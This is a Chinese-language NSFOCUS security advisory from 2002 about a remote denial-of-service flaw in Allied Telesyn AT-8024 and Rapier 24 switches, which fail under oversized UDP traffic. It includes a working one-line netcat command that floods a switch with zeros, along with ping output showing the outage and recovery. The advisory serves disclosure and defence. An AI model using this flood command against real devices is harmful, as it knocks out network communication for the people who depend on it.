NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Allied Telesyn交换机UDP数据远程拒绝服务攻击漏洞

发布日期：2002-11-26
更新日期：2002-12-03

受影响系统：

Allied Telesyn AT-8024 1.3.1
Allied Telesyn Rapier 24

描述：

BUGTRAQ  ID: 6233

AT-8024和Rapier 24交换机是由Allied Telesyn开发和维护的以太交换机。

交换机不能正确处理超大UDP数据流，远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击，导致不能正常进行通信。

对两这种交换机的管理接口发送超大的UDP数据，可使设备不稳定，停止对正常通信的响应。

<*来源：Oleg A. Lebedev （techdir@mns.ru）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103817074629716&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Oleg A. Lebedev （techdir@mns.ru）提供了如下测试方法：

cat /dev/zero | nc -u 192.168.0.13 Open_Port &

Pinging 192.168.0.103 with 32 bytes of data:

Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Request timed out. // Start sending zero stream: cat /dev/zero | nc -u
192.168.0.103 6789
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out. // Stop sending zero stream
Reply from 192.168.0.103: bytes=32 time=203ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30

建议：

厂商补丁：

Allied Telesyn
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.alliedtelesyn.com/product/8024

http://www.alliedtelesyn.com/product/RAPIER24

浏览次数：3874
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客